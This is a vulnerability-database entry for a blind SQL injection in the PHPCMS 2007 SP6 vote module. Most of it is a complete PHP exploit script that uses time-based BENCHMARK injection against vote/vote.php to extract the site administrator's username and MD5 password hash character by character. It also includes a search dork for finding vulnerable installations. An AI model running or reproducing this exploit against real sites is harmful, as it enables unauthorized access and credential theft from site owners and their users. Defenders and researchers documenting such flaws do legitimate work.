PHPCMS2007 SP6 vote模块SQL注射漏洞

基本字段

漏洞编号：: SSV-4061

披露/发现时间：: 未知

提交时间：: 2008-09-16

漏洞等级：

漏洞类别：: SQL 注入

影响组件：: phpcms

漏洞作者：: 未知

提交者：: Knownsec

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

漏洞详情

贡献者 Knownsec 共获得 0.15KB

共 1 兑换了

PoC (非 pocsuite 插件)

贡献者 Knownsec 共获得 0.5KB

#!/usr/bin/php <?php print_r(' +---------------------------------------------------------------------------+ Phpcms 2007 SP6 Bind SQL injection / admin credentials disclosure exploit by puret_t mail: puretot at gmail dot com team: http://www.wolvez.org dork: "Powered by Phpcms 2007" +---------------------------------------------------------------------------+ '); /** * works regardless of php.ini settings */ if ($argc < 3) { print_r(' +---------------------------------------------------------------------------+ Usage: php '.$argv[0].' host path host: target server (ip/hostname) path: path to phpcms Example: php '.$argv[0].' localhost /phpcms/ +---------------------------------------------------------------------------+ '); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $benchmark = 100000000; $timeout = 10; $cmd = 'voteid=999999&attribute=1&op=999999)/**/AND/**/ryat%23'; $resp = send(); preg_match('/([a-z0-9]+)_vote_option/', $resp, $pre); if ($pre) { echo "Plz Waiting...\n"; /** * get admin password */ $j = 1; $pass = ''; $hash[0] = 0; //null $hash = array_merge($hash, range(48, 57)); //numbers $hash = array_merge($hash, range(97, 102)); //a-f letters while (strlen($pass) < 32) { for ($i = 0; $i <= 255; $i ++) { if (in_array($i, $hash)) { $cmd = 'voteid=999999&attribute=1&op=999999)/**/AND/**/(IF((ASCII(SUBSTRING((SELECT/**/password/**/FROM/**/'.$pre[1].'_member/**/WHERE/**/groupid=1/**/LIMIT/**/1),'.$j.',1))='.$i.'),BENCHMARK('.$benchmark.',CHAR(0)),1))%23'; send(); usleep(2000000); $starttime = time(); send(); $endtime = time(); $difftime = $endtime - $starttime; if ($difftime > $timeout) { $pass .= chr($i); echo chr($i); break; } } if ($i == 255) exit("\nExploit Failed!\n"); } $j ++; } echo "\t"; /** * get admin username */ $j = 1; $user = ''; while (strstr($user, chr(0)) === false) { for ($i = 0; i <= 255; $i ++) { $cmd = 'voteid=999999&attribute=1&op=999999)/**/AND/**/(IF((ASCII(SUBSTRING((SELECT/**/username/**/FROM/**/'.$pre[1].'_member/**/WHERE/**/groupid=1/**/LIMIT/**/1),'.$j.',1))='.$i.'),BENCHMARK('.$benchmark.',CHAR(0)),1))%23'; send(); usleep(2000000); $starttime = time(); send(); $endtime = time(); $difftime = $endtime - $starttime; if ($difftime > $timeout) { $user .= chr($i); echo chr($i); break; } if ($i == 255) exit("\nExploit Failed!\n"); } $j ++; } exit("Expoilt Success!\nadmin:\t$user\nPassword(md5):\t$pass\n"); } else exit("Exploit Failed!\n"); function send() { global $host, $path, $cmd; $message = "POST ".$path."vote/vote.php HTTP/1.1\r\n"; $message .= "Accept: */*\r\n"; $message .= "Accept-Language: zh-cn\r\n"; $message .= "Content-Type: application/x-www-form-urlencoded\r\n"; $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n"; $message .= "CLIENT-IP: ".time()."\r\n"; $message .= "Host: $host\r\n"; $message .= "Content-Length: ".strlen($cmd)."\r\n"; $message .= "Connection: Close\r\n\r\n"; $message .= $cmd; $fp = fsockopen($host, 80); fputs($fp, $message); $resp = ''; while ($fp && !feof($fp)) $resp .= fread($fp, 1024); return $resp; } ?>